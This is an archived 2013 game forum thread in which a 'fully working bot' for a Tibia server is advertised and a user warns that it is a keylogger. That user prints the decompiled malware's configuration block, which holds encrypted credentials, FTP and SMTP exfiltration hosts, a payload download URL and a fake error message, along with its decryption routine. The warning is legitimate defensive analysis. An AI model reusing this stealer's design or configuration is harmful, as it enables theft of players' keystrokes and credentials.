Deprecated: The behavior of unparenthesized expressions containing both '.' and '+'/'-' will change in PHP 8: '+'/'-' will take a higher precedence in /home/iano/public_html/tpforums-vb5/forum/includes/class_core.php on line 5842

PHP Warning: Use of undefined constant MYSQL_NUM - assumed 'MYSQL_NUM' (this will throw an Error in a future version of PHP) in ..../includes/init.php on line 165

PHP Warning: Use of undefined constant MYSQL_ASSOC - assumed 'MYSQL_ASSOC' (this will throw an Error in a future version of PHP) in ..../includes/init.php on line 165

PHP Warning: Use of undefined constant MYSQL_BOTH - assumed 'MYSQL_BOTH' (this will throw an Error in a future version of PHP) in ..../includes/init.php on line 165

PHP Warning: "continue" targeting switch is equivalent to "break". Did you mean to use "continue 2"? in ..../includes/functions_navigation.php on line 588

PHP Warning: "continue" targeting switch is equivalent to "break". Did you mean to use "continue 2"? in ..../includes/functions_navigation.php on line 612

PHP Warning: Use of undefined constant archive_postsperpage - assumed 'archive_postsperpage' (this will throw an Error in a future version of PHP) in ..../archive/index.php on line 456
NOW RELEASED! 100% Fully working bot for The-Realots [Archive] - Forums

PDA

View Full Version : NOW RELEASED! 100% Fully working bot for The-Realots



Raywin
12-12-2013, 04:50 AM
I am haxer

simona
12-12-2013, 09:37 AM
hax plssss

Blahhh
12-12-2013, 11:05 AM
yup this containts keylogger, screen capturer and all the other shit you can imagine

decompiled it and found some encrypted strings which probably decrypts to his email/password/ftp etc:


Shared Sub New()
Module1.Field_12 = False
Module1.Field_18 = False
Module1.Field_10 = False
Module1.Field_11 = False
Module1.Field_9 = False
Module1.ΨεΔΧΛσ = False
Module1.Field_7 = "20"
Module1.ζσπκβμ = "AaD"
Module1.ΡΥτΔςω = 4
Module1.Field_23 = "ιΥηΨ"
Module1.Field_19 = "CurrentUser"
Module1.Field_17 = "χδΙΓδΟ"
Module1.Field_16 = "kgUofWkudc"
Module1.βτξΦΙε = "iexplorer.exe"
Module1.Field_14 = "+SDDate+"
Module1.Field_6 = False
Dim sArr1 As String() = New string() { _
"Tibia", _
"Tibia client do not match (xp000000256) error", _
"16" }
Module1.Message = sArr1
Module1.μΓνθψΠυΝ = "+DelOff+"
Module1.ΠΓπΨξΞζς = False
Module1.ΖΧεΣιψπτ = True
Module1.ΔΩνΤνδΓΗ = False
Module1.Field_4 = "10"
Module1.Field_21 = False
Module1.οΒΚΖΣΛΖς = "QDdzMaIZMQ"
Module1.θΠΠΝΝΤ = False
Module1.Field_13 = "http://www.exampleserver.com/directfile.exe"
Module1.Field_3 = False
Module1.ΡδΠΔενψ = "Lighthack.exe"
Module1.Field_20 = True
Module1.ΟΗΝαΕΞγα = False
Module1.ΒεηΟΟμμσ = "uLKyKkBLOQQmiHVo96CGxw=="
Module1.Field_26 = "ftp.drivehq.com"
Module1.Field_15 = "uLKyKkBLOQQmiHVo96CGxw=="
Module1.Field_5 = ""
Module1.ωΕνξθξε = "smtp.gmail.com"
Module1.Field_22 = "4ag2dH0fb2q2Bfu4SJcDCBv+VUpWO7KWECYo0WNzB8a5L4+8Ty e48w=="
Module1.νΛΣΥΥθι = "57WaTtjpcHU1yZogYRNd9mOKAAsI9d7UgYrPe8Tyag8="
Module1.ΤθΙΗωΠξ = "4ag2dH0fb2q2Bfu4SJcDCBv+VUpWO7KWECYo0WNzB8a5L4+8Ty e48w=="
Module1.ΛΚζιγγΦ = "587"
Module1.ΣμΣυΤψτ = "Active Window:"
Module1.ΔΗυιλΕο = "- Project Neptune"
Module1.χςςΔΔΚΜ = True
Module1.ΦςΣΕΙΥΒ = True
Module1.τΩαΟΥΠΛ = True
Module1.Field_24 = True
Module1.KeyboardHandle = CType(0, IntPtr)
Module1.LastCheckedForegroundTitle = ""
Module1.callback = Nothing
End Sub


Also found the decrypt function.


Public Shared Function ΓΠζαδΔ(ByVal value As String, ByVal key As String) As String
Dim s1 As String

Dim tripleDESCryptoServiceProvider1 As TripleDESCryptoServiceProvider = New TripleDESCryptoServiceProvider
tripleDESCryptoServiceProvider1.IV = New byte(8) {}
Dim passwordDeriveBytes1 As PasswordDeriveBytes = New PasswordDeriveBytes(key, New byte(0) {})
tripleDESCryptoServiceProvider1.Key = passwordDeriveBytes1.CryptDeriveKey("RC2", "MD5", 128, New byte(8) {})
Dim bArr1 As Byte() = Convert.FromBase64String(value)
Dim memoryStream1 As MemoryStream = New MemoryStream(value.Length)
Dim cryptoStream1 As CryptoStream = New CryptoStream(memoryStream1, tripleDESCryptoServiceProvider1.CreateDecryptor(), CryptoStreamMode.Write)
cryptoStream1.Write(bArr1, 0, CInt(bArr1.Length))
cryptoStream1.FlushFinalBlock()
Dim bArr2 As Byte() = New byte((CInt((memoryStream1.Length - CLng(1))) + 1)) {}
memoryStream1.Position = CLng(0)
memoryStream1.Read(bArr2, 0, CInt(memoryStream1.Length))
cryptoStream1.Close()
Return Encoding.UTF8.GetString(bArr2)
End Function